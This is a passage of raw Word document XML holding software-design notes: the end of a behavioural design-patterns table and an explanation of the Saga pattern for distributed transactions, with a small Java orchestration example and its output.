      </w:tblGrid>
      <w:tr w:rsidR="00FE4147" w:rsidRPr="00FE4147" w14:paraId="795D54AD" w14:textId="77777777" w:rsidTr="002E0126">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="13B6295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4E5DA3AF"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285A4B52" w14:textId="77777777" w:rsidTr="002E0126">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0C86647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1AC8E73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ne-to-many dependency, subject notifies observers on state change.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FE4147" w:rsidRPr="00FE4147" w14:paraId="58331920" w14:textId="77777777" w:rsidTr="002E0126">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2B0860A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7B71CF8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family of algorithms, encapsulates them, and makes them interchangeable.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FE4147" w:rsidRPr="00FE4147" w14:paraId="5ADF1E61" w14:textId="77777777" w:rsidTr="002E0126">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3B57CB8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2289B6B"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Example: Remote control with command buttons.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FE4147" w:rsidRPr="00FE4147" w14:paraId="29788FD8" w14:textId="77777777" w:rsidTr="002E0126">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3C9D462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78993AF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skeleton of algorithm, letting subclasses redefine specific steps.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FE4147" w:rsidRPr="00FE4147" w14:paraId="1133EEF4" w14:textId="77777777" w:rsidTr="002E0126">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1133113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6F28F46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change behavior when its internal state changes.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FE4147" w:rsidRPr="00FE4147" w14:paraId="5F7E8797" w14:textId="77777777" w:rsidTr="002E0126">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1062C5A9"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38458EA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of handlers. Example: Support ticket system (Level 1 → Level 2).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FE4147" w:rsidRPr="00FE4147" w14:paraId="35588A5F" w14:textId="77777777" w:rsidTr="002E0126">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="14248D6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951E20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entral controller that manages communication between objects (no direct communication).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FE4147" w:rsidRPr="00FE4147" w14:paraId="077B5E29" w14:textId="77777777" w:rsidTr="002E0126">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="20C12CF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DE6BA0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traverse elements in a collection sequentially.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FE4147" w:rsidRPr="00FE4147" w14:paraId="40137E8C" w14:textId="77777777" w:rsidTr="002E0126">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="22D8068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547FA616"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 object’s internal state for restoring later. Example: Undo feature.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FE4147" w:rsidRPr="00FE4147" w14:paraId="153CB3C2" w14:textId="77777777" w:rsidTr="002E0126">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="46EA91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2FDEE6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grammar and interpreter for a language. Example: Boolean expression parser.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FE4147" w:rsidRPr="00FE4147" w14:paraId="6616BE22" w14:textId="77777777" w:rsidTr="002E0126">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="54C8E05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3953FCD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you define new operations without changing the classes of elements. Useful in hierarchical structures like XML/ASTs.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="118900E3"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7AAF37">
          <v:rect id="_x0000_i2030" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FF3B278" w14:textId="77777777" w:rsidR="002E0126" w:rsidRPr="00CE4B95" w:rsidRDefault="002E0126" w:rsidP="00FE4147">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FE4147">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">These design patterns help create </w:t>
      </w:r>
      <w:r w:rsidRPr="00FE4147">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>flexible, scalable, and maintainable</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE4147">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> code in large-scale software systems by promoting best practices.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E020F6A" w14:textId="26F7C09F"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31" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3939B871" w14:textId="673D54AC" w:rsidR="003C003F" w:rsidRPr="00CE4B95" w:rsidRDefault="00B76115">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="435" w:name="_Toc197867649"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Explain Saga design pattern</w:t>
      </w:r>
      <w:r w:rsidR="003C003F" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="435"/>
    </w:p>
    <w:p w14:paraId="65D53B2C" w14:textId="0B4F841B" w:rsidR="00244286" w:rsidRPr="00FE4147" w:rsidRDefault="0024428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microservices pattern</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE4147">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> used to manage </w:t>
      </w:r>
      <w:r w:rsidRPr="00FE4147">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>long-running distributed transactions</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE4147">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in a system where a single transaction is broken down into a series of smaller, isolated transactions (or steps). Each transaction updates a service and ensures eventual consistency.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="404BE32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Unlike traditional transactions, where all operations either succeed or fail (ACID properties), a </w:t>
      </w:r>
      <w:r w:rsidRPr="00FE4147">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Saga</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE4147">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> enables </w:t>
      </w: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xml:space="preserve"> to be managed by coordinating the smaller transactions across multiple services. If one of the steps fails, compensation transactions are executed to roll back the changes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A55EC51"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235DB">
          <v:rect id="_x0000_i2032" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D57AC28"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77742E0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lastRenderedPageBreak/>
        <w:t>Saga</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE4147">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: A sequence of local transactions where each service involved in the saga executes a transaction and updates its database.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F15D466"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Local Transactions</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE4147">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Each step of the saga is a local transaction that is executed by a single service.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43822698"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ensation</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE4147">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: If a transaction fails, compensation is required to undo the previous steps in the saga, ensuring that the system remains consistent.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="730F716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w:t>
      </w:r>
      <w:r w:rsidRPr="00FE4147">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: In this style, services communicate directly with each other to decide when and how to execute their transactions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="327D801D"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w:t>
      </w:r>
      <w:r w:rsidRPr="00FE4147">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: A central service (orchestrator) controls the saga and coordinates the execution of each transaction step.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13A8A55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8CBE0">
          <v:rect id="_x0000_i2033" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="47DBB50D"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Saga Execution:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52BD8146"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based Sagas</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE4147">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B153432"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rvices publish events (e.g., via message queues).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07802CDF"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ch service listens for events and reacts accordingly (executes its own local transaction).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B461E28"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 central coordinator.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BFFD8BF"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based Sagas</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE4147">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="112AE6A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central orchestrator service coordinates the saga execution.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35DFC1F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e orchestrator triggers each step of the saga and decides when to trigger compensation actions if any transaction fails.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="642172D4"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24EDB">
          <v:rect id="_x0000_i2034" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="723F1524"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 of Saga Pattern:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="791AF605"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entralized</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE4147">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Unlike a monolithic database where a single system coordinates the transaction, the saga allows each service to handle its own local transactions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A5D060B"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ce</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE4147">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: In case of failure, compensation mechanisms ensure that the system can roll back or revert to a consistent state.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DBDA0F2"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Enables handling large-scale, long-running distributed transactions in microservices architectures.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ED452A8"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7F269">
          <v:rect id="_x0000_i2035" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6273E2DA"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of Saga (Orchestration-based):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12D2AD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say we are processing an order payment system across multiple microservices:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="375F5498"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 Creates an order.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F3D2282"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Processes payment for the order.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4761C685"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 Deducts inventory.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D09A85F"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hipping Service</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE4147">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Ships the product.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="468D06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f </w:t>
      </w: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xml:space="preserve"> fails, we need to compensate by:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B2BFE66"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versing the order</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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51CB6512"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toring inventory</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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02F1517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FB9198">
          <v:rect id="_x0000_i2036" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ECEE13F"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 of Saga Orchestration:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61A435BB"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rderService: Handles order creation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73AE43D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OrderService {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F6D6113"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reateOrder() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22320B5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reate Order</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74E8EE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reated.");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="270626B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2070EF9" w14:textId="77777777" w:rsidR="00244286" w:rsidRPr="00FE4147" w:rsidRDefault="00244286" w:rsidP="00FE4147">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="53D6228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Order() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58F8489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Order if payment fails</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4806EDF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anceled.");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CE37C9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2F634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AFF898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PaymentService: Processes payments and triggers events.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="084B125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PaymentService {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="430BBD2B"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processPayment() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3464F67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ocess payment logic</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2050C10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System.out.println("Payment processed.");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="550AC69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970A762" w14:textId="77777777" w:rsidR="00244286" w:rsidRPr="00FE4147" w:rsidRDefault="00244286" w:rsidP="00FE4147">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="11D214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Payment() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4355FC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payment if needed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54CD0B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Payment canceled.");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="594FE20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89E4F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1C505322"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SagaOrchestrator: Manages the saga and calls services in sequence.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5091F46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agaOrchestrator {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A59DD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OrderService orderService;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34A5690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PaymentService paymentService;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48BB2E00" w14:textId="77777777" w:rsidR="00244286" w:rsidRPr="00FE4147" w:rsidRDefault="00244286" w:rsidP="00FE4147">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4FE0848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agaOrchestrator(OrderService orderService, PaymentService paymentService) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7348F04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orderService = orderService;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5037C23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paymentService = paymentService;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0621B4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560FF53F" w14:textId="77777777" w:rsidR="00244286" w:rsidRPr="00FE4147" w:rsidRDefault="00244286" w:rsidP="00FE4147">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3D405FF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executeSaga() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69AE0D5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ry {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5542026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reateOrder();  // Step 1: Create order</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60629C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processPayment();  // Step 2: Process payment</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="422D1D2E"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ntinue with further services like Inventory and Shipping</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57C538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completed successfully.");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4426371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tch (Exception e) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="091D2AE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mpensate if any failure occurs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F03B1D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cancelPayment();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BC966D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ancelOrder();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="487BC7C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failed. Compensated.");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FAC36E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CC2D6F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9BDB18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D503BD1"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Test the Saga:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A13AE8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1C00C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3D57D7C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 orderService = new OrderService();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DFD80D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 paymentService = new PaymentService();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3144EE55" w14:textId="77777777" w:rsidR="00244286" w:rsidRPr="00FE4147" w:rsidRDefault="00244286" w:rsidP="00FE4147">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3C78032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agaOrchestrator orchestrator = new SagaOrchestrator(orderService, paymentService);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="631CD11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chestrator.executeSaga();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="638D6F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3F5213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E0909B0"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D39D4">
          <v:rect id="_x0000_i2037" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BC5675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4F19B27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rder created.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27DF8A5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yment processed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45CB1E0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aga completed successfully.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C4B8DAB"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04A0A">
          <v:rect id="_x0000_i2038" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1986A986"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When to Use Saga Pattern:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E222955"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When a long-running transaction spans multiple microservices.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F988FCC"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Eventual Consistency</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE4147">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: When the system doesn’t require strict ACID properties and can tolerate eventual consistency.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AD170DA"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t Systems</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE4147">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: When you need to ensure that failures in one service do not cause the whole system to fail.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FE3630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Pattern</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE4147">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is crucial in </w:t>
      </w:r>
      <w:r w:rsidRPr="00FE4147">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>microservices architectures</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE4147">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
